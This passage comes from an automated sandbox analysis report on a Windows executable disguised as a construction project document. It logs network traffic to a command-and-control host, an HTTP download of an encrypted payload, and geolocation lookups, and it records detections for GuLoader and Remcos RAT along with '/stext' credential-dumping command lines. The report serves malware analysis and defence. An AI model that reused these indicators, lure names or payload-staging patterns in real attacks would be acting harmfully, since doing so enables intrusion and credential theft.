                                                                                                                        Dec 16, 2024 16:18:54.520061970 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.521111012 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.521121979 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.521156073 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.521879911 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.521891117 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.521929979 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.523014069 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.523199081 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.523236990 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.523991108 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.524159908 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.524218082 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.524715900 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.524837971 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.524880886 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.525959969 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.526047945 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.526092052 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.527089119 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.527137041 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.527169943 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.528143883 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.528273106 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.528486013 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.529344082 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.529474020 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.529514074 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.530518055 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.530704021 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.530745029 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.531805992 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.531884909 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.531927109 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.532778978 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.532918930 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.532963991 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.533876896 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.533936977 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.533979893 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.654972076 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.654990911 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.655081034 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.655337095 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.655550957 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.655601978 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.656325102 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.656493902 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.656546116 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.657444954 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.657613039 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.657664061 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.658608913 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.658714056 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.658761978 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.659701109 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.659823895 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.659872055 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.660883904 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.660957098 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.661009073 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.662033081 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.662149906 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.662190914 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.663158894 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.663269997 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.663327932 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.664390087 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.664463043 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.664525032 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.665435076 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.665510893 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.665561914 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.666589022 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.666713953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.666759014 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.667749882 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.667937040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.667987108 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.668930054 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.669028997 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.669073105 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.670046091 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.670154095 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.670196056 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:56.962496042 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:57.147308111 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147331953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147340059 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147349119 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147356987 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147367001 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147375107 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147382975 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147391081 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147388935 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:57.147401094 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147428036 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:57.267787933 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.267800093 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.267808914 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.267812967 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268044949 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268055916 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268471956 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268534899 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:19:14.390125990 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:19:14.391990900 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:19:14.511816978 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:19:44.465233088 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:19:44.467070103 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:19:44.587343931 CET240449737162.251.122.87192.168.2.4

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Dec 16, 2024 16:18:51.477490902 CET5482153192.168.2.41.1.1.1
                                                                                                                        Dec 16, 2024 16:18:51.715620041 CET53548211.1.1.1192.168.2.4

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Dec 16, 2024 16:18:51.477490902 CET192.168.2.41.1.1.10x3b4eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Dec 16, 2024 16:18:51.715620041 CET1.1.1.1192.168.2.40x3b4eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • 66.63.187.30
                                                                                                                        • geoplugin.net

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.44973666.63.187.30807864C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 16, 2024 16:18:43.989994049 CET178OUTGET /wBWcspgeBmkxYD199.bin HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                        Host: 66.63.187.30
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Dec 16, 2024 16:18:45.335046053 CET1236INHTTP/1.1 200 OK
                                                                                                                        Content-Type: application/octet-stream
                                                                                                                        Last-Modified: Sun, 15 Dec 2024 21:04:46 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        ETag: "4b7db7f8344fdb1:0"
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        Date: Mon, 16 Dec 2024 15:18:45 GMT
                                                                                                                        Content-Length: 493120
                                                                                                                        Data Raw: 4d cf 1a 26 eb 1e 25 8b 4a 41 b7 e4 30 3c 42 f5 35 1f b7 26 bd 2d 68 f6 25 7d 32 c7 89 02 0d d6 c8 b6 9c 4d 09 82 0d 47 39 68 bc 67 e6 0e 74 36 13 29 27 d0 62 87 b6 98 2f 71 d2 43 97 b4 df 9b 05 3c 16 b7 88 eb 97 6d b6 f8 ba f0 cc eb 3d 3a f1 fd 15 fe 79 4f cb c7 34 2a 3d c5 bf 78 17 cd 9f be b2 0e 28 cb 4f d8 c1 62 32 22 6c 24 4c 76 fc 45 1c 8d f9 a0 48 b3 42 4a cb d4 a5 69 b0 1c a0 ea b9 8c 46 0a 9d e3 0f fa c6 e9 0f 37 d1 a2 aa d3 c1 7a ce 0f ab 7e 03 1c 62 e4 62 bf 26 27 51 31 c3 d1 02 2b 29 8b 35 0e 5b c1 60 ac c8 bb 6c c7 33 e7 3d 29 6d 87 7b 74 c8 1c 70 c8 3f f0 50 2f e7 e0 4e c0 3f 6e d1 0e 42 7a f7 6f a5 f8 22 16 c1 e4 2b 1d ab e7 5e b1 b1 48 fe 78 92 f7 b5 7f 1d 0b a4 16 67 95 65 42 11 47 52 3b 3f 0b a2 e8 10 4a 7f 48 00 15 dd f7 69 30 15 cf 41 af ec 7e ae 41 85 73 5e 2e b6 4c 54 80 02 fc 29 07 bc 7a 60 7f e8 2b 3d bb db 6f 91 8d 7a 02 64 80 be c4 2a a2 c1 a5 ae ba 14 e0 36 1e 6a cb 39 b5 9f b5 4a f9 b3 dd 44 ff a8 3b 7c d9 8b 87 d5 0b 2a 2a c0 af 93 2e f1 7f 09 a1 f1 24 97 20 38 9e 67 c4 [TRUNCATED]
                                                                                                                        Data Ascii: M&%JA0<B5&-h%}2MG9hgt6)'b/qC<m=:yO4*=x(Ob2"l$LvEHBJiF7z~bb&'Q1+)5[`l3=)m{tp?P/N?nBzo"+^HxgeBGR;?JHi0A~As^.LT)z`+=ozd*6j9JD;|**.$ 8gd>yR0d<O#QR6&? lM/{;<%=!\9XJYv[2cKfGE:Zvyh/f,*(yGW;l*j&6fbXAOcEjdN!O~8?#[KYg@/d3l<.p**RJ:i:Q[1e{Jq1v;xT;S;`=HsUFcN`rp|JpdP,OEM!w3tdUPu9p'qj^387;Z^f\;fw7QkB7S,t)*DJ|M"{P[g`+`Bi E@HrHUO[0(?&C,X~*bd7rRU,mo5c*qbctA7N[YG4':e"o*=c=<|pA?qEoQSA6I4k;"@@+k!L;C%aB<%V
                                                                                                                        Dec 16, 2024 16:18:45.335092068 CET1236INData Raw: d0 82 2a 6e 02 e7 56 5b fc 3e c2 1f 79 d4 15 6f 03 01 43 3b 5b bd d9 f1 07 98 53 b5 b5 67 b1 3d 77 f7 5d a4 50 b2 a8 f3 ea 4c a4 74 57 d3 f4 ee 04 43 ac f6 f3 86 10 be c1 d5 2b 2c d5 10 3d c6 2f b6 14 16 be ea 65 0b 18 4e 1c 9e fd 73 a0 80 e4 0f
                                                                                                                        Data Ascii: *nV[>yoC;[Sg=w]PLtWC+,=/eNs3=seE50(eM6|F?QN;6,>[[&61rxtJ){R2vF}1`ni$b1{_pbRyDL.gZt?=%!$'DrG
                                                                                                                        Dec 16, 2024 16:18:45.335110903 CET1236INData Raw: 34 d7 ec 05 f9 87 21 a0 4e 19 73 5f 2a 17 87 d9 34 d5 e0 33 a0 5c e6 d4 0e 4a 73 4b f0 83 ac 0b 63 cf 46 71 83 4b d5 b4 c3 a0 fa bc 1a c9 74 4d 5e 02 a9 91 9a c4 e0 aa 75 9e 91 0f 62 58 f3 4d fa ba f5 92 30 cf 55 3f 40 2a 79 3f da 69 f1 97 ab cf
                                                                                                                        Data Ascii: 4!Ns_*43\JsKcFqKtM^ubXM0U?@*y?i$SVQvhEqN?&B6T1s?Pu],%vQ>;t19KvI'7Tp5cD9&gWhlu43oAZZh)vtB9';D:kwgH^
                                                                                                                        Dec 16, 2024 16:18:45.335175991 CET1236INData Raw: cb f6 3f c8 71 34 0b 39 3e 7f 92 62 6b 49 af 74 c4 d5 39 a4 46 0c 05 6a 98 a2 2c 81 f4 57 cd 54 c5 56 26 34 74 0a e9 e9 a9 1b e5 4e 46 98 3a 5e 7a 46 8c a7 f5 6c 5d f1 33 a3 0c 31 87 c1 11 06 bd b3 78 93 52 24 98 cc 5b 86 a6 b2 67 e1 8f c4 9d 7d
                                                                                                                        Data Ascii: ?q49>bkIt9Fj,WTV&4tNF:^zFl]31xR$[g}E>.tBO=[)2aF6ZndeY"h|}4oSnXG. sUgm,,(pe.p6NO@XS}j
                                                                                                                        Dec 16, 2024 16:18:45.335197926 CET1236INData Raw: f8 96 d3 4a b3 7d 6b 2e 28 24 3a 2b c7 27 84 a7 2f 9c 34 2c 2a 17 2c a0 eb cc f2 89 44 54 31 42 04 0f 69 83 41 9c 1d a9 60 93 ab e8 ac 50 d0 2e 47 2f a5 d1 60 7d 24 47 88 62 f3 c4 a0 08 5d 48 12 41 69 20 ce db 1e 8b 24 76 f0 a0 de 8f 4f 5b f4 b1
                                                                                                                        Data Ascii: J}k.($:+'/4,*,DT1BiA`P.G/`}$Gb]HAi $vO[|V?/7T,Na7,U.X27cUr=Fc.5^,B48q#!N/>,*;ey;qEMUS4:*U1`1P;Al
                                                                                                                        Dec 16, 2024 16:18:45.335241079 CET1236INData Raw: 9f e3 b3 fa 38 b1 44 6b 15 29 d2 8a 8b ed 54 af 7d 42 b4 e5 8f ce b6 ab ed 6a 70 7b fe 48 08 9a db 66 85 e3 fe 19 14 a5 06 50 47 1f 5a 22 d9 9e 47 f3 8d 30 1d 25 80 eb 2c 11 ad 38 ea e3 26 eb fd c3 3f 9c a7 e1 5c 11 b5 e1 00 26 7f a8 4f 07 45 a7
                                                                                                                        Data Ascii: 8Dk)T}Bjp{HfPGZ"G0%,8&?\&OE`"i#H\7xFKnfZpew^|+BMGj5?T.=XsFp$?`B-3m@efrEYi`<u4yC+9
                                                                                                                        Dec 16, 2024 16:18:45.335259914 CET1236INData Raw: 85 40 44 ec 79 ba 14 f0 ee fa d1 e1 df 8c be 43 ac f1 e0 3c 55 74 37 23 83 66 13 b5 e3 6d 31 df 01 f3 8d ef 6b 11 03 b1 9c c2 f2 f5 a9 d4 39 7e 8a de 76 93 fd ed da 8f 26 0c 89 cd 17 58 65 9e 72 53 37 ab fc a1 9e 63 7c 50 1d 63 e9 21 b9 47 da 75
                                                                                                                        Data Ascii: @DyC<Ut7#fm1k9~v&XerS7c|Pc!GuOPFPE4h\N#2yP2Zh^/ck%-qM1*}x:y2v#t_}iouaH MtY<9+Xqbra'9w@[FdxG<v>!&ukD
                                                                                                                        Dec 16, 2024 16:18:45.335581064 CET1236INData Raw: 93 ee 73 e1 1a 28 24 3d f8 c1 38 c5 ce ab ea be 76 38 93 b8 35 d3 f0 3d 73 4a b0 9c 19 a1 8f 52 48 06 c2 f1 bb b6 be 48 77 77 1e 73 1c 0b c1 be b3 37 87 08 38 4c 2e f7 c0 3c 86 40 62 5a c1 0d 1f 39 a7 12 99 c3 d5 6c ec 80 b8 c2 3c 8b c5 2b 06 20
                                                                                                                        Data Ascii: s($=8v85=sJRHHwws78L.<@bZ9l<+ 2)|1qyNr6/~_ix,,z`3:9;w2SGv%Ls_F`\>UziZ&=>DJ_OH>wXb/)RE:7R
                                                                                                                        Dec 16, 2024 16:18:45.335599899 CET1236INData Raw: 3d 62 71 91 5b 25 27 13 5c 9d e8 4e 1e ac 3d b1 27 b0 65 a1 d2 75 cf 8f 9c eb 83 92 66 ce e5 c7 c1 9f 83 6a e1 bf 66 9e 73 93 e7 e5 43 ba a9 91 5b 3f 38 60 c8 8f 84 48 25 6b 7c 3b aa 71 66 25 12 ce 40 27 30 0e 6f 3e 27 71 b7 eb fe 5d e3 82 f5 87
                                                                                                                        Data Ascii: =bq[%'\N='eufjfsC[?8`H%k|;qf%@'0o>'q]]=dBS]PdCL+gt=<,\i|wz8/Fm$S\ qBk`1*d~VX\]ar_|@.'f2W@-TR/tgJhH2P4
                                                                                                                        Dec 16, 2024 16:18:45.335619926 CET1236INData Raw: fb 5b 5e 83 1a 87 75 0c bb 3e 62 10 b5 0b c3 da d5 ac a6 3e 66 89 1f 0f a4 88 1a f2 e0 0d f0 25 3e fc 75 67 1b 29 95 52 c2 51 70 0d 6a 4a 98 e8 6d 20 1f 18 5e af 4d 23 b7 ce 5c 2f 38 73 cb b4 be 52 ab 3c 06 0c 79 9b fa e5 f5 a2 2f 3e 30 6e 91 c7
                                                                                                                        Data Ascii: [^u>b>f%>ug)RQpjJm ^M#\/8sR<y/>0nAg!/8Ov__V-(`1W_nk(m$@!!3[V&YgecG:G98s'O*!MK =G50`*-\0t&w'$^AF@9{
                                                                                                                        Dec 16, 2024 16:18:45.455117941 CET1236INData Raw: 86 2b 8d 24 2d eb 73 e6 45 3c 3d 49 bd 2d 41 d0 e2 37 e4 4a 81 1e ca 70 b0 e7 bc 8c 48 91 76 57 31 ec 8f 71 89 2b 73 af ae c4 89 7c 03 b8 8b 40 a9 9c d8 c2 b4 6b 6b 5b 88 52 1a 8e 70 12 66 b9 a5 27 c1 10 e9 58 45 be 80 88 94 c0 f0 7e b1 8d f7 8e
                                                                                                                        Data Ascii: +$-sE<=I-A7JpHvW1q+s|@kk[Rpf'XE~v([]&$Ijnm<g]Q$JBoLvvMQZ9^MkV)Z'RRy.1[@+@~C


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.449739178.237.33.50807864C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 16, 2024 16:18:51.839926004 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                        Host: geoplugin.net
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Dec 16, 2024 16:18:53.084805012 CET1171INHTTP/1.1 200 OK
                                                                                                                        date: Mon, 16 Dec 2024 15:18:52 GMT
                                                                                                                        server: Apache
                                                                                                                        content-length: 963
                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                        cache-control: public, max-age=300
                                                                                                                        access-control-allow-origin: *
                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:10:18:03
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1965807835.0000000004BAA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:4
                                                                                                                        Start time:10:18:29
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        General

                                                                                                                        Target ID:5
                                                                                                                        Start time:10:18:53
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:6
                                                                                                                        Start time:10:18:53
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\zmfiflhnvmtjoudzbkcxkyywgeg"
                                                                                                                        Imagebase:0x400000
